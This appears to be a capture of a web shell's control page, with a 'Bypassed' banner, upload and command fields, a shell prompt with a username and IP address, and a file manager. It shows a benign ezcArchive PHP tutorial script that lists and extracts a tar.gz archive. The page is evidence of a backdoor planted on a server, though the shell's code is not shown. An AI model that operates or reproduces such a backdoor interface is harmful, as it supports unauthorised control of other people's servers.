[ Th3_Err0r Bypassed ]




Upload:

Command:

liwaavux@216.73.216.140: ~ $
<?php
require_once 'tutorial_autoload.php';

$options = new ezcArchiveOptions( array( 'readOnly' => true ) );
$archive = ezcArchive::open(
    "compress.zlib:///tmp/my_archive.tar.gz", null, $options );

// The foreach method calls internally the iterator methods.
foreach( $archive as $entry )
{
    echo $entry, "\n";

    $archive->extractCurrent( "/tmp/target_location/" );
}
?>

Filemanager

Name Type Size Permission Actions
CREDITS File 229 B 0644
LICENSE File 1.53 KB 0644
example.php File 1.44 KB 0644
tutorial.txt File 4.96 KB 0644
tutorial_autoload.php File 495 B 0644
tutorial_directories.php File 390 B 0644
tutorial_extract.php File 532 B 0644
tutorial_iterator.php File 298 B 0644
tutorial_read_only.php File 383 B 0644
tutorial_recursive.php File 949 B 0644
tutorial_replacing.php File 390 B 0644